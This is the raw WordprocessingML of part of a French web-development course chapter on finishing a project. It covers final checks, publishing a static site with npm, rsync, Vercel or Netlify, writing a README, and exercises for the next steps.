              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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Accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Lighthouse + clavier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Aucun blocage, contrastes AA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2512"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3399"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lighthouse mobile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3103"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>LCP &lt; 2,5 s, CLS &lt; 0,1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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Responsive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Outils de développement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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320 px à 1920 px</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2512"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Liens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3399"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vérificateur de liens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3103"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucun 404</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un parcours de dix minutes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Parcours manuel de vérification</w:t>
        <w:br/>
        <w:t># 1. Tabuler sur chaque page : le focus est-il toujours visible ?</w:t>
        <w:br/>
        <w:t># 2. Zoomer à 200 % : le contenu reste-t-il lisible et complet ?</w:t>
        <w:br/>
        <w:t># 3. Naviguer avec le clavier seul : tous les composants fonctionnent-ils ?</w:t>
        <w:br/>
        <w:t># 4. Désactiver JavaScript : le contenu essentiel est-il présent ?</w:t>
        <w:br/>
        <w:t># 5. Simuler un réseau lent : un indicateur apparaît-il ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>36.8 Étape 7 : publication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'hébergement statique est gratuit et suffisant pour ce projet. Le principe est toujours le même : construire, puis envoyer le contenu du dossier produit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois façons de publier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Construction</w:t>
        <w:br/>
        <w:t>npm run build</w:t>
        <w:br/>
        <w:br/>
        <w:t># Envoi par rsync vers un hébergement classique</w:t>
        <w:br/>
        <w:t>rsync -avz --delete dist/ utilisateur@serveur:/var/www/mon-site/</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ou publication sur une plateforme statique</w:t>
        <w:br/>
        <w:t>npx vercel deploy --prod dist/</w:t>
        <w:br/>
        <w:t>npx netlify deploy --prod --dir=dist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Contrôler ce qui est réellement servi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Vérifications après mise en ligne</w:t>
        <w:br/>
        <w:t>curl -I https://exemple.fr                 # code 200, en-têtes de sécurité</w:t>
        <w:br/>
        <w:t>curl -I https://exemple.fr/assets/index-3f2a91.css   # cache long</w:t>
        <w:br/>
        <w:t># Tester sur un appareil réel : téléphone, réseau mobile</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DÉPLOIEMENT ATOMIQUE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Publication où la nouvelle version remplace l'ancienne d'un seul coup, sans état intermédiaire. En cas d'échec, l'ancienne version reste servi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>36.9 Étape 8 : documenter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un projet sans documentation est un projet impossible à reprendre. Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>README.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de vingt lignes suffit s'il contient les bonnes informations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une documentation suffisante · markdown</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Site de l'association culturelle</w:t>
        <w:br/>
        <w:br/>
        <w:t>Site vitrine statique : trois pages, thème clair et sombre,</w:t>
        <w:br/>
        <w:t>formulaire d'inscription.</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Installation</w:t>
        <w:br/>
        <w:t xml:space="preserve">    npm install</w:t>
        <w:br/>
        <w:t xml:space="preserve">    npm run dev        # http://localhost:8080</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Construction</w:t>
        <w:br/>
        <w:t xml:space="preserve">    npm run build      # produit dist/</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Structure</w:t>
        <w:br/>
        <w:t xml:space="preserve">    src/               sources</w:t>
        <w:br/>
        <w:t xml:space="preserve">    dist/              fichiers construits, non versionnés</w:t>
        <w:br/>
        <w:t xml:space="preserve">    assets/styles/     trois couches : base, composants, pages</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Décisions</w:t>
        <w:br/>
        <w:t>- Aucune bibliothèque d'interface : le CSS natif suffit.</w:t>
        <w:br/>
        <w:t>- Thème mémorisé dans `localStorage`, synchronisé entre onglets.</w:t>
        <w:br/>
        <w:t>- Validation native complétée par des messages explicites.</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Accessibilité</w:t>
        <w:br/>
        <w:t>Contrastes AA vérifiés, navigation clavier complète,</w:t>
        <w:br/>
        <w:t>lien d'évitement, formulaire annoncé.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>CE QUI DISTINGUE UN PROJET PROFESSIONNEL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un historique Git lisible.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une structure de fichiers prévisible.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Aucune dépendance inutile.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Des états d'erreur et de chargement prévus.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une documentation à jour.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>36.10 Pour aller plus loin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce cours s'arrête à la publication d'un site statique. Trois pistes prolongent naturellement le parcours : un cadre applicatif pour les interfaces à état complexe, un back-end pour les données persistantes, et une chaîne d'intégration continue pour automatiser les contrôles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.117 — Quatre prolongements naturels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66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Piste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Quand l'aborder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Premier pas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2660"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cadre applicatif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3399"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interface à nombreux états</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un composant, puis deux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2660"/>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Back-end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Données à stocker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Une API minimale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2660"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intégration continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3399"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plusieurs contributeurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un test automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2660"/>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Tests de bout en bout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Parcours critiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Un scénario Playwright</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La partie suivante approfondit quatre de ces pistes avant de laisser la place au cours 2, consacré à l'infrastructure, au déploiement continu et à l'exploitation.</w:t>
      </w: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cadrage précède le code.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contenu réel révèle les problèmes de mise en page.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Une page possède un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et des repères sémantiques.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styles s'organisent en fondations, composants et pages.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Chaque module JavaScript possède son état et son initialisation.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formulaire conserve la saisie en cas d'échec.</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Cinq contrôles précèdent toute publication.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Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>README.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> court et juste vaut mieux qu'aucune documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le site est livré. La dernière partie revient sur les outils qui le rendent durable : CSS contemporain, composants réutilisables, contenu multilingue et maintenance.</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36.1 — Construire la page d'accueil</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Réalisez le squelette complet de la page d'accueil.</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En-tête, héros, trois programmes, pied de page.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 xml:space="preserve">Un seul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour les sections.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Aucune image sans dimensions ni alternative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 36.2 — Écrire le module de filtres</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Les programmes se filtrent par catégorie, avec un compteur.</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 xml:space="preserve">Un bouton par catégorie, avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-pressed</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 xml:space="preserve">Masquez avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
